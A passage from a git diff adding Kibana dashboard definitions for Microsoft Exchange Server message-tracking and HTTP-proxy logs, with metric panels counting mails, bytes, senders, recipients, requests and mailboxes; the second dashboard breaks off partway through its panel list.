a/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af.json b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af.json new file mode 100644 index 00000000000..18a0ed7fc4b --- /dev/null +++ b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af.json @@ -0,0 +1,729 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"3d2a1e85-63b4-441e-ab8c-daa2649a4347\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"3d2a1e85-63b4-441e-ab8c-daa2649a4347\",\"fieldName\":\"email.from.address\",\"title\":\"Sender\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"fd53de73-57dd-43b2-bebb-568d827bb1c0\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"fd53de73-57dd-43b2-bebb-568d827bb1c0\",\"fieldName\":\"email.to.address\",\"title\":\"Recipient\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"9ecedc0a-e663-453f-8749-a65c1a7afdb2\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"9ecedc0a-e663-453f-8749-a65c1a7afdb2\",\"fieldName\":\"email.direction\",\"title\":\"Direction\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"18aa9b9b-bcce-49ad-98b3-2f5922e86ec5\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"18aa9b9b-bcce-49ad-98b3-2f5922e86ec5\",\"fieldName\":\"email.message_id\",\"title\":\"Message ID\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": true, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e5eebc9-c386-4646-acb3-dc5a73fcf3d5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Unique Mails", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "email.message_id" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5e5eebc9-c386-4646-acb3-dc5a73fcf3d5", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2", + "w": 5, + "x": 0, + "y": 0 + }, + "panelIndex": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2", + "title": "", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "27ddc785-e09f-4f3c-9ecc-296dd4850ed7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Bytes", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "network.bytes" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "27ddc785-e09f-4f3c-9ecc-296dd4850ed7", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d", + "w": 5, + "x": 5, + "y": 0 + }, + "panelIndex": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d", + "title": "", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-87a010e4-c30d-4e6f-bc3d-92243524aab9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dd24428d-5254-4f78-b5c6-9d86a5d91936", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "87a010e4-c30d-4e6f-bc3d-92243524aab9": { + "columnOrder": [ + "7cf0d637-3c30-4985-9e33-bbd10815068f", + "8369ed93-f022-456d-8271-52ab4184930b" + ], + "columns": { + "7cf0d637-3c30-4985-9e33-bbd10815068f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "8369ed93-f022-456d-8271-52ab4184930b": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "dd24428d-5254-4f78-b5c6-9d86a5d91936", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "8369ed93-f022-456d-8271-52ab4184930b" + ], + "layerId": "87a010e4-c30d-4e6f-bc3d-92243524aab9", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "7cf0d637-3c30-4985-9e33-bbd10815068f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {} + }, + "gridData": { + "h": 10, + "i": "c2941fdd-a809-4df1-9e6d-d7eee27beb94", + "w": 38, + "x": 10, + "y": 0 + }, + "panelIndex": "c2941fdd-a809-4df1-9e6d-d7eee27beb94", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "babc91d8-a1dc-460e-91a5-d4ed43b2f403", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Sender", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "email.sender.address" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "babc91d8-a1dc-460e-91a5-d4ed43b2f403", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "c76a7520-c667-4361-b6d3-c4456707745c", + "w": 5, + "x": 0, + "y": 5 + }, + "panelIndex": "c76a7520-c667-4361-b6d3-c4456707745c", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "599c1b5b-7d55-4694-b3b2-7ba02c4753e6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique recipients", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "email.to.address" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "599c1b5b-7d55-4694-b3b2-7ba02c4753e6", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "4b074730-0383-424e-94db-29a8e9147189", + "w": 5, + "x": 5, + "y": 5 + }, + "panelIndex": "4b074730-0383-424e-94db-29a8e9147189", + "title": "", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 22, + "i": "2028bea0-99d5-4ec6-a790-be7642c5a083", + "w": 48, + "x": 0, + "y": 10 + }, + "panelIndex": "2028bea0-99d5-4ec6-a790-be7642c5a083", + "panelRefName": "panel_2028bea0-99d5-4ec6-a790-be7642c5a083", + "type": "search", + "version": "8.10.4" + } + ], + "timeRestore": false, + "title": "[Logs Exchange Server] Messagetracking", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:14:48.072Z", + "id": "microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af", + "managed": true, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2:5e5eebc9-c386-4646-acb3-dc5a73fcf3d5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d:27ddc785-e09f-4f3c-9ecc-296dd4850ed7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c2941fdd-a809-4df1-9e6d-d7eee27beb94:indexpattern-datasource-layer-87a010e4-c30d-4e6f-bc3d-92243524aab9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c2941fdd-a809-4df1-9e6d-d7eee27beb94:dd24428d-5254-4f78-b5c6-9d86a5d91936", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c76a7520-c667-4361-b6d3-c4456707745c:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c76a7520-c667-4361-b6d3-c4456707745c:babc91d8-a1dc-460e-91a5-d4ed43b2f403", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b074730-0383-424e-94db-29a8e9147189:indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b074730-0383-424e-94db-29a8e9147189:599c1b5b-7d55-4694-b3b2-7ba02c4753e6", + "type": "index-pattern" + }, + { + "id": "microsoft_exchange_server-ee0a5030-c03f-11ee-a682-0f218cc418af", + "name": "2028bea0-99d5-4ec6-a790-be7642c5a083:panel_2028bea0-99d5-4ec6-a790-be7642c5a083", + "type": "search" + }, + { + "id": "logs-*", + "name": "controlGroup_3d2a1e85-63b4-441e-ab8c-daa2649a4347:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_fd53de73-57dd-43b2-bebb-568d827bb1c0:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_9ecedc0a-e663-453f-8749-a65c1a7afdb2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_18aa9b9b-bcce-49ad-98b3-2f5922e86ec5:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88.json b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88.json new file mode 100644 index 00000000000..cbafca63307 --- /dev/null +++ b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-8e9d55c5-637a-4fd8-b53b-9501e98a8e88.json @@ -0,0 +1,1492 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"a5fe2192-b77c-4f16-888e-4e59fe064c78\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"a5fe2192-b77c-4f16-888e-4e59fe064c78\",\"fieldName\":\"microsoft.exchange.anchormailbox\",\"title\":\"Anchormailbox\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"7c8291ec-dc6d-4fa0-8d67-bb53efdf6c57\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7c8291ec-dc6d-4fa0-8d67-bb53efdf6c57\",\"fieldName\":\"microsoft.exchange.authenticateduser\",\"title\":\"Authenticated user\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"f542c63c-4265-4ebc-a9d6-7278f4d3976a\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f542c63c-4265-4ebc-a9d6-7278f4d3976a\",\"fieldName\":\"microsoft.exchange.urlhost\",\"title\":\"URL Host\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": true, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e6c91c87-ff12-4e3b-9ce7-b54ed4facc16", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "393ff722-36ef-4257-a95f-a704eeaab9fc" + ], + "columns": { + "393ff722-36ef-4257-a95f-a704eeaab9fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e6c91c87-ff12-4e3b-9ce7-b54ed4facc16", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "393ff722-36ef-4257-a95f-a704eeaab9fc" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "d2e19276-b24c-4239-ab0f-3b9c328fb252", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "d2e19276-b24c-4239-ab0f-3b9c328fb252", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests Bytes", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "http.request.bytes" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9276c7a4-c750-4092-81d5-ea02cccadc91", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "8a0f3277-f4af-40f5-9526-0b8be36b2daf", + "w": 8, + "x": 8, + "y": 0 + }, + "panelIndex": "8a0f3277-f4af-40f5-9526-0b8be36b2daf", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Response Bytes", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "http.response.bytes" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9048201a-d0d3-42b8-bd95-4a8caaed9cef", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 6, + "i": "8cd05d59-543a-4b41-9bdd-49b7b8e2cd31", + "w": 8, + "x": 16, + "y": 0 + }, + "panelIndex": "8cd05d59-543a-4b41-9bdd-49b7b8e2cd31", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db318c6d-c8a9-4f58-89ce-3cafe82ddb9d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Users", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "microsoft.exchange.authenticateduser" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "db318c6d-c8a9-4f58-89ce-3cafe82ddb9d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba", + "w": 8, + "x": 24, + "y": 0 + }, + "panelIndex": "3fdd01ea-f1a6-4aef-9f4c-ceb6d2c787ba", + "title": "", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d64931ec-87ab-4503-9c67-dbb397048ac8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7eefe26a-cbbb-424b-a989-b3be44ac08ed", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d64931ec-87ab-4503-9c67-dbb397048ac8": { + "columnOrder": [ + "952417c4-82da-4f1d-91c3-c7343981be3e" + ], + "columns": { + "952417c4-82da-4f1d-91c3-c7343981be3e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Mailboxes", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "microsoft.exchange.anchormailbox" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "7eefe26a-cbbb-424b-a989-b3be44ac08ed", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.httpproxy" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.httpproxy" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "d64931ec-87ab-4503-9c67-dbb397048ac8", + "layerType": "data", + "metricAccessor": "952417c4-82da-4f1d-91c3-c7343981be3e" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 6, + "i": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91", + "w": 8, + "x": 32, + "y": 0 + }, + "panelIndex": "fdf2a0a3-389d-4f7c-9684-5b8d1ed89c91", + "title": "", + "type": "lens" + }, + { + 